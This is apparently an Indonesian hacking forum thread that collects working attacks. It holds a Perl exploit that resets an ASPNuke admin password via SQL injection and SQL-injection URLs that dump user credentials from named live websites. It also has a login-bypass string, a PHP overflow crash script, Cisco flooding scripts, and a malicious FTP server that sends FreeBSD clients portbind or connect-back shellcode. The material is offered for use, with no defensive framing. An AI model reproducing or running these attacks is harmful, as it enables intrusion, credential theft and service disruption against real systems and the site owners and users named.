Kumpulan Bugs

[Digital Cat]

Exploit untuk ASPNuke dan ASP Portal

Code: Select all

#!/usr/bin/perl
######################################################################################
#       			                            Organization Of Cat
######################################################################################
# Exploit untuk ASPNuke dan ASP Portal
#
# Exploit By: [email protected]
#
######################################################################################
#  Terima Kasih  kepada ==>  Alpha_programmer , Crouz Security Team , Hat-squad security team
######################################################################################
use IO::Socket;

if (@ARGV < 1)
{
 print "\n==========================================\n";
 print " \n     -- Digital Cat --\n\n";
 print "     Organization Of Cat      \n\n";
 print "     cara gunakan:ASPNuke.pl <Victim> \n\n";
 print "==========================================\n\n";
 print "Contoh:\n\n";
 print "   ASPNuke.pl www.victim.com \n";
 exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "koneksi terputus ke $host" }

print "[+]Terhubung\n";

$addr = "GET /module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c'%20,%20username='trapset'%20where%20userID=1%20-- HTTP/1.0\n";
$addr .= "Host: $host\n\n\n\n";
print "\n";
print $remote $addr;
print "[+]Sedang diproses...";
sleep(5);
print "melakukan proses pergantian password ...\n";

print "[+]OK , Sekarang mau loginnya dengan apa,silahkan konfirmasi : \n";
print "Username: trapset\n";
print "Password: trapset\n\n";

Okey…

[Digital Cat]

Multiple SQL Injection Vulnerability

Injection pada :

• projects.php;
  contacts.php;
  users.php;
  types_authors.php;
  bibliographies.php;
  types_projects.php;
  types_languages.php;
  types_countries.php;

Code :

Code: Select all

UNION SELECT @@version%23

Demo :

• http://bibciter.net/demo/reports/projects.php?idp=-721)%20UNION%20SELECT%20@@version%23
  http://bibciter.net/demo/reports/contacts.php?idc=-1)%20UNION%20SELECT%20@@version%23
  http://bibciter.net/demo/reports/users.php?idu=-1)%20UNION%20SELECT%20@@version%23

Vulnerable function:

Code: Select all

function get_vatitle($idregister,$idregistervalue,$nameregister,$tableregister,$pretitle) {
 $vartitle = "SELECT $nameregister FROM $tableregister WHERE ($idregister=$idregistervalue)";
 $vartitle = mysql_query($vartitle) or die("error functions_queries line 4");
 $vartitle = mysql_fetch_array($vartitle);
 extract($vartitle);
 $title = $pretitle." » ".$$nameregister;
 return $title;
}

Key….

[Digital Cat]

Powered by BKWorks ProPHP Version 0.50 Beta 1

Login as :

Code: Select all

Username : admin ' or ' 1=1

Password : anything or nothing

And you will be logged in.

Live Demo

• http://old.bkworksproducts.info/content ... os/ProPHP/

Key…

[Digital Cat]

Bugs Online v2.14 Sql Injection

Download :
http://sourceforge.net/project/showfile ... p_id=42528

Bug :

Code: Select all

http://[site]/help.asp?stype=-999'%20union%20select%200,suser_name,spassword%20from%20tblusers%20where%20'1

Key…

[Digital Cat]

noticias.php

Victim :
www.caindependiente.com

Link :
www.caindependiente.com/cms/noticias.php

Code: Select all

union+all+select+0,1,2,3,concat%28usuario,0x3a3a,pass%29,5,6,7,8,9+from+usuarios—

Demo:
http://www.caindependiente.com/cms/noticias.php?id=-1+union+all+select+0,1,2,3,concat%28usuario,0x3a3a,pass%29,5,6,7,8,9+from+usuarios--

Login :
http://www.caindependiente.com/cms/login.php

key…

[Digital Cat]

Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow

Target :

• com_print_typeinfo

Greetz :

• shinnai

Code :

Code: Select all

<?php
$FTW = str_repeat("A",1992);
com_print_typeinfo($FTW); 
echo "Digital Cat.";
?>

Key…

[Digital Cat]

Flood Cisco CSS tipe 11000, 11050,11150,11800

Programming language : perl

Code: Select all

#!/usr/bin/perl
use Net::RawIP;
$s_addr = $ARGV[0];
$vic = $ARGV[1];
print "\Digital Cat ([email protected])\n";
if(!$ARGV[1]){
	die "Cara pengunaan: perl $0 <source address> <victim>\n";
}
@ports =(1..1024);
sub packet{
	print "My Cat now commencing with packetting..\n";
	$port= shift(@ports);
	$p = new Net::RawIP;
	$p->set({ip => {saddr => $s_addr,daddr => $vic},
		    tcp => {source => 31337,dest => $port,psh => 1, syn => 1}});
	$p->send(0.05,150);
}
for($i=0;$i<10;$i++){
	packet;
}

Key…

[Digital Cat]

Flood Cisco Tipe 677

Programming language :
Perl

Target Port :
23

Service :
Telnet Server

Code :

Code: Select all

#!/usr/bin/perl
use IO::Socket;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s})){&usage; }
$serv = $args{s};
$foo = "?????????????????a~                %%%%%XX%%%%%"; $number = 30000;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto       => "tcp",
PeerAddr    => $args{s},
PeerPort    => "(23)",
) || die("Service Telnet tidak ditemukan! on $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nMengirim Packets\n");
sub usage {die("\n$0 -s <server>\n\n");}

Key…

[Digital Cat]

PoC exploit freebsd

Target :

• IglooFTP (FreeBSD 4.7)
  cftp (FreeBSD 4.7)
  Moxftp (FreeBSD 4.7)
  cftp (FreeBSD 5.0)
  IglooFTP (FreeBSD 5.0)
  Moxftp (FreeBSD 5.0)\n"

Code :

Code: Select all

#!/usr/bin/perl

use IO::Socket;

sub convert_ret {
my($ret) = @_;
    
    for ($x=8; $x>0; $x=$x-2){
	$ret = substr($ret_temp,$x,2);
	$new_ret .= chr hex "$ret";
    }
return $new_ret;
}

sub convert_ip {
my($ip) = @_;

@ip_tmp = split(/\./, $ip);

for($x=0; $x<4; $x++) {
    $new_ip .= chr @ip_tmp[$x];
}
return $new_ip;
}

$server_port = 21;
$passive_server_port = 10324;

unless(@ARGV == 3 || @ARGV == 2) 
{ die 
"Penggunaan ./DSR-ftp_clients.pl Shellcode Client Ip\n
\tShellcode:\t0 = Portbind
\t\t\t1 = Connect back\n
\tClient:\t\t0 = IglooFTP (FreeBSD 4.7)
\t\t\t1 = cftp (FreeBSD 4.7)
\t\t\t2 = Moxftp (FreeBSD 4.7)
\t\t\t3 = cftp (FreeBSD 5.0)
\t\t\t4 = IglooFTP (FreeBSD 5.0)
\t\t\t5 = Moxftp (FreeBSD 5.0)\n"
}

($shellcode_arg, $client_arg, $extra_arg) = @ARGV;

$user_ip = convert_ip($extra_arg);

@shellcode_list = (
    "Portbind,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80",
    "Connect Back,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68"."$user_ip"."\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80");

@client_list = (
    "IglooFTP - FreeBSD 4.7,188,0xbfbfc560,0",
    "cftp - FreeBSD 4.7,8192,0xbfbffb04,1,300",
    "mftp - FreeBSD 4.7,516,0xbfbff8e0,1,100",
    "cftp - FreeBSD 5.0,8196,0xbfbffa30,1,300",
    "IglooFTP - FreeBSD 5.0,212,0xbfbfc440,0",
    "mftp - FreeBSD 5.0,532,0xbfbff950,1,100");

@client_info = split(/,/,@client_list[$client_arg]);
@shellcode_info = split(/,/,@shellcode_list[$shellcode_arg]);

print "\tDSR-ftp_clients by Digital Cat\n
Setting up Service on Port: $server_port
Client: @client_info[0]
Using Shellcode: @shellcode_info[0]
Using Offset: @client_info[2]\n";

$shellcode = @shellcode_info[1];
$shellcode_length = length($shellcode);

$nop_count = @client_info[1] - $shellcode_length - 8;
$nops = "\x90"x$nop_count;

$ret_temp = @client_info[2];
$ret = substr($ret_temp,2,8);
$ret = convert_ret($ret);
$ret = "$ret"x2;

if(@client_info[3] eq "1") {
    $nops_x = "\x90"x@client_info[1];
    $nops_y = "\x90"x@client_info[4];
    $exploit_string = "$nops_x"."$ret"."$nops_y"."$shellcode";
}

if($client_arg == 0 or $client_arg == 4) {
	$exploit_string ="total 666
drwxr-xr-x	25 root wheel	1536 Jan 28 00:13 .
drwxr-xr-x	14 root wheel	 512 Jan 28 00:13 ..
-rwxr-xr-x	 2 digital_cat	digital_cat	 512 Jan 29 01:00 $nops$shellcode$ret";
}

$server = IO::Socket::INET->new(LocalPort => $server_port,
                                Type    => SOCK_STREAM,
                                Reuse   => 1,
                                Listen  => 10)
or die "My Cat Can't listen on $server_port : $!\n";

while ($client = $server->accept()) {
    
    if(@client_info[3] == 1) {
	print $client "220 $exploit_string\n";
    }
    
    if(@client_info[3] eq "0") {
	print $client "220 0xdeadcode\n";
	while($request !=~ /QUIT/i) {
	    $request = <$client>;
	    print $request;
	    
	    if($request =~ /PASS/i) {
		print $client "230 User anonymous My Cat logged in.\n";
	    }
	    
	    if($request =~ /USER/i) {
		print $client "331 Anonymous Password required for My Cat.\n";
	    }
	
	    if($request =~ /SYST/i) {
		print $client "215 UNIX Type: L8\n";
	    }
	
	    if($request =~ /REST/i) {
		print $client "350 My Cat Restarting.\n";
	    }
	
	    if($request =~ /TYPE/i) {
		    print $client "200 My Cat Type set to A.\n";
	    }
	    
	    if($request =~ /PWD/i or $request =~ /FEAT/i) {
		print $client "257 \"/usr/home/digital_cat/\" is current directory.\n";
	    }
	
	    if($request =~ /PASV/i) {
		$passive_server = IO::Socket::INET->new(LocalPort => $passive_server_port,
					Type 	=> SOCK_STREAM,
					Reuse 	=> 1,
					Listen 	=> 10)
		or die "My Cat Can't open passive port";
		print $client "227 My Cat Entering Passive Mode (127,0,0,1,40,84)\n";
	    }
	    
	    if ($request =~ /LIST/i) {
		while($passive_client = $passive_server->accept()){
		    print $client "150 My Cat Starting transfer.\n";    
		    print $passive_client $exploit_string;
		    close $passive_client;
		    print $client "226 BANG My Cat DEAD!!!\n";
		}
	    }		
	}
    close $client;
    }
}

[Muhammad_ibl]

Ne ada beberapa bug SQL Injection..Mudah-mudahan dapat menjadi bahan referensi..

Code: Select all

http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28table_name%29

%20from%20information_schema.tables%20where%20table_schema=database%28%29--

Code: Select all

http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28column_name%2

9%20from%20information_schema.columns%20where%20table_name=0x6d656d62657273686970--

Code: Select all

http://www.skw.co.id/news.php?id=-91%20union%20select%201,group_concat%28table_name%29,3,4,5

%20from%20information_schema.tables%20where%20table_schema=database%28%29--

Code: Select all

http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28bb_username,0x3a,b

b_password%29,3,4,5,6,7,8%20from%20bb_users--

Code: Select all

http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28username,0x3a,pass

word%29,3,4,5,6,7,8%20from%20cms_users--